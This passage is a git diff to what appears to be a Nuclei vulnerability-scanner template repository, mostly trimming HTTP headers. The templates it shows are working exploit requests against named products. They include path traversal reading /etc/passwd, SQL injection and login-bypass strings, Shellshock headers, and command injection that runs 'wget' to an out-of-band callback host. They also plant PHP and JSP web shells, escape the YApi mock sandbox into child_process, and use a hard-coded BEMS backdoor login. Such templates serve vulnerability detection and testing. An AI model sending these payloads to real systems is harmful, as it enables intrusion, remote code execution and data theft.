| #linux GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded - | #windows GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml index fd92d1f28d..95f977e802 100644 --- a/vulnerabilities/other/jfrog-unauth-build-exposed.yaml +++ b/vulnerabilities/other/jfrog-unauth-build-exposed.yaml @@ -12,8 +12,6 @@ requests: - | POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4271.0 Safari/537.36 - X-Requested-With: XMLHttpRequest Content-Type: application/json {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index dd5701ed28..ae79e71a41 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -14,11 +14,7 @@ requests: POST /http/index.php HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/javascript, */*; q=0.01 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close requester=login&request=login¶ms=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D diff --git a/vulnerabilities/other/kevinlab-bems-sqli.yaml b/vulnerabilities/other/kevinlab-bems-sqli.yaml index 7a15fb4b13..2f24495c6d 100644 --- a/vulnerabilities/other/kevinlab-bems-sqli.yaml +++ b/vulnerabilities/other/kevinlab-bems-sqli.yaml @@ -16,12 +16,8 @@ requests: - | POST /http/index.php HTTP/1.1 Host: {{Hostname}} - Accept: application/json, text/javascript, */*; q=0.01 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate - Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 - Connection: close requester=login&request=login¶ms=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] diff --git a/vulnerabilities/other/keycloak-xss.yaml b/vulnerabilities/other/keycloak-xss.yaml index f35e230373..ba87129f63 100644 --- a/vulnerabilities/other/keycloak-xss.yaml +++ b/vulnerabilities/other/keycloak-xss.yaml @@ -13,9 +13,6 @@ requests: POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Content-Type: application/x-www-form-urlencoded {"":1} diff --git a/vulnerabilities/other/landray-oa-fileread.yaml b/vulnerabilities/other/landray-oa-fileread.yaml index 03348be0ca..89b603702d 100644 --- a/vulnerabilities/other/landray-oa-fileread.yaml +++ b/vulnerabilities/other/landray-oa-fileread.yaml @@ -12,11 +12,7 @@ requests: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - Connection: close - Content-Length: 44 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} @@ -24,11 +20,7 @@ requests: - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 - Connection: close - Content-Length: 44 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///c://windows/win.ini"}} diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml index d9a923a421..c8b3ae4704 100644 --- a/vulnerabilities/other/maian-cart-preauth-rce.yaml +++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml @@ -16,31 +16,21 @@ requests: - | GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close - | POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: application/json, text/javascript, /; q=0.01 - Connection: close Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest - Pragma: no-cache - Cache-Control: no-cache - Content-Length: 97 cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e - | GET /product-downloads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate Accept: */* - Connection: close extractors: - type: regex diff --git a/vulnerabilities/other/mida-eframework-xss.yaml b/vulnerabilities/other/mida-eframework-xss.yaml index 743d669bdd..93bffe41df 100644 --- a/vulnerabilities/other/mida-eframework-xss.yaml +++ b/vulnerabilities/other/mida-eframework-xss.yaml @@ -11,7 +11,6 @@ requests: - | POST /MUP/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/MUP @@ -22,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - '">' \ No newline at end of file diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index 49b88d2924..bb1ef6443a 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -13,9 +13,7 @@ requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 - Connection: keep-alive Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 key=';`wget http://{{interactsh-url}}`;# diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 9bb69eefdd..1524463563 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -15,20 +15,13 @@ requests: - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 - Connection: close Accept: */* - Accept-Language: en - Accept-Encoding: gzip + matchers-condition: and matchers: diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index fcbe0611ec..9b4442dcd8 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -14,10 +14,7 @@ requests: - | POST /boardDataWW.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive Content-Type: application/x-www-form-urlencoded macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit diff --git a/vulnerabilities/other/oa-tongda-path-traversal.yaml b/vulnerabilities/other/oa-tongda-path-traversal.yaml index 80503ebdaa..56aa950f64 100644 --- a/vulnerabilities/other/oa-tongda-path-traversal.yaml +++ b/vulnerabilities/other/oa-tongda-path-traversal.yaml @@ -12,8 +12,6 @@ requests: - | POST /ispirit/interface/gateway.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 43 Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../mysql5/my.ini"} diff --git a/vulnerabilities/other/oa-v9-uploads-file.yaml b/vulnerabilities/other/oa-v9-uploads-file.yaml index b008ebe22d..7f4da77bff 100644 --- a/vulnerabilities/other/oa-v9-uploads-file.yaml +++ b/vulnerabilities/other/oa-v9-uploads-file.yaml @@ -13,13 +13,8 @@ requests: - | POST /page/exportImport/uploadOperation.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 - Content-Length: 216 - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 Origin: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo - Connection: close ------WebKitFormBoundaryFy3iNVBftjP6IOwo Content-Disposition: form-data; name="file"; filename="poc.jsp" @@ -31,7 +26,6 @@ requests: - | GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 req-condition: true matchers: diff --git a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml index 7c4f59db40..f79ef39c18 100644 --- a/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml +++ b/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml @@ -14,17 +14,13 @@ requests: - raw: - | POST /boaform/admin/formTracert HTTP/1.1 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - Connection: keep-alive - Referer: http://{{Hostname}}/diag_ping_admin_en.asp - Upgrade-Insecure-Requests: 1 Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/diag_ping_admin_en.asp User: e8c Password: e8c - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 target_addr="1.1.1.1+`wget+http%3A%2F%2F{{interactsh-url}}%2F`"&waninf=127.0.0.1" diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 9c2df26245..59fe7b7f44 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -11,8 +11,10 @@ requests: - method: GET path: - "{{BaseURL}}" + headers: User-Agent: zerodiumvar_dump(233*233); + matchers-condition: and matchers: diff --git a/vulnerabilities/other/powercreator-cms-rce.yaml b/vulnerabilities/other/powercreator-cms-rce.yaml index 427bf5239a..629eb80d17 100644 --- a/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/vulnerabilities/other/powercreator-cms-rce.yaml @@ -12,8 +12,6 @@ requests: - | POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 225 Content-Disposition: form-data;name="file1";filename="poc.aspx"; Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136 @@ -27,8 +25,6 @@ requests: - | GET /ResourcePic/{{endpoint}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip extractors: - type: regex diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index aae82c8c57..dea9993e30 100644 --- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -12,14 +12,12 @@ requests: - | POST /directdata/direct/router HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 - Content-Length: 178 {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} + - | GET /poc.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 matchers-condition: and matchers: diff --git a/vulnerabilities/other/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml index ddca7fb8fe..03aef64b1d 100644 --- a/vulnerabilities/other/rce-shellshock-user-agent.yaml +++ b/vulnerabilities/other/rce-shellshock-user-agent.yaml @@ -8,10 +8,12 @@ info: requests: - method: GET - headers: - User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" path: - "{{BaseURL}}/cgi-bin/status" + + headers: + User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" + matchers: - type: regex regex: diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 393ae08a2a..c08699eb6d 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -5,9 +5,6 @@ info: author: dwisiswant0 severity: high tags: rconfig,rce - - # This template supports the user creation part only. - # To triggering an RCE, see reference[2]. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 @@ -18,16 +15,13 @@ requests: POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Accept: */* - User-Agent: python-requests/2.23.0 - Connection: close Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb - Upgrade-Insecure-Requests: 1 - Cookie: PHPSESSID=pdnuclei + Cookie: PHPSESSID={{randstr}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="username" - pdnuclei + {{randstr}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="passconf" @@ -39,7 +33,7 @@ requests: --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="email" - nuclei@projectdiscovery.io + test@{{randstr.tld}} --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="editid" @@ -58,7 +52,8 @@ requests: matchers: - type: word words: - - "User pdnuclei successfully added to Database" + - "User {{randstr}} successfully added to Database" + part: body - type: status status: diff --git a/vulnerabilities/other/ruijie-eg-rce.yaml b/vulnerabilities/other/ruijie-eg-rce.yaml index d2fd73f7de..c3c1bccd2b 100644 --- a/vulnerabilities/other/ruijie-eg-rce.yaml +++ b/vulnerabilities/other/ruijie-eg-rce.yaml @@ -14,18 +14,14 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password=admin?show+webmaster+user - | POST /login.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 49 Content-Type: application/x-www-form-urlencoded - X-Requested-With: XMLHttpRequest username=admin&password={{admin}} @@ -33,7 +29,6 @@ requests: POST /cli.php?a=shell HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 111 notdelay=true&command=cat /etc/passwd diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 8f52c10b10..a93e658328 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -14,18 +14,14 @@ requests: - | POST /guest_auth/guestIsUp.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 111 ip=127.0.0.1|echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K"|base64 -d > poc.php&mac=00-00 - | GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 - Content-Length: 2 matchers-condition: and matchers: diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 82c8b1411b..902279b7f8 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -5,8 +5,7 @@ info: author: gy741 severity: critical description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: - - https://www.exploit-db.com/exploits/49344 + reference: https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob requests: @@ -14,10 +13,7 @@ requests: - | GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml index d61b1a5d52..574d070ebd 100644 --- a/vulnerabilities/other/showdoc-file-upload-rce.yaml +++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml @@ -12,10 +12,7 @@ requests: - | POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 - Content-Length: 239 Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633 - Accept-Encoding: gzip ----------------------------835846770881083140190633 Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index da355a03d4..b9fc3b354d 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -12,15 +12,8 @@ requests: - | POST /dashboard/uploadID.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 - Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: deflate - X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 - Content-Length: 267 - DNT: 1 - Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="poc.php" @@ -31,11 +24,10 @@ requests: system($cmd); ?> -----------------------------5825462663702204104870787337-- + - | GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 2 extractors: - type: regex diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 95c345c98a..7d1c7a4706 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -16,8 +16,6 @@ requests: Host: {{Hostname}} User-Agent: "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" Accept: */* - Accept-Language: en - Connection: close matchers-condition: and matchers: diff --git a/vulnerabilities/other/vpms-auth-bypass.yaml b/vulnerabilities/other/vpms-auth-bypass.yaml index 610c0e676f..d0dcd358f6 100644 --- a/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/vulnerabilities/other/vpms-auth-bypass.yaml @@ -11,14 +11,10 @@ requests: - | POST /login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Referer: http://{{Hostname}}/login.php + Referer: {{BaseURL}}/login.php Cookie: PHPSESSID=q4efk7p0vo1866rwdxzq8aeam8 - Connection: keep-alive - Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27%40email.com&password=%27%3D%27%27or%27&btn_login=1 diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index 5fc0d294da..92f0058339 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -16,61 +16,43 @@ requests: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* - Accept-Encoding: gzip - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 106 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 89 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 382 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip cookie-reuse: true extractors: diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index a67e1f1177..f8e73a2cf6 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -13,10 +13,7 @@ requests: - | GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 68e0db9695..fbc1e03821 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -11,15 +11,11 @@ requests: - | POST /zms/admin/index.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Origin: http://{{Hostname}} - Connection: close - Referer: http://{{Hostname}}/zms/admin/index.php - Cookie: PHPSESSID=s22oss00i0ob4hcnsgkobb9r7p - Upgrade-Insecure-Requests: 1 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zms/admin/index.php + Cookie: PHPSESSID={{randstr}} username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= diff --git a/vulnerabilities/rocketchat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml index 981b5ee0e5..0041ad36f2 100644 --- a/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -14,12 +14,8 @@ requests: POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - X-Requested-With: XMLHttpRequest Content-Type: application/json - User-Agent: Ophion SecurityGroup Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"} @@ -27,11 +23,7 @@ requests: POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close Content-Type: application/json - User-Agent: Ophion SecurityGroup - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} diff --git a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml index 1f8a3bb2db..ab2d3656d9 100644 --- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml +++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml @@ -12,22 +12,13 @@ requests: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - | POST / HTTP/1.1 Host: 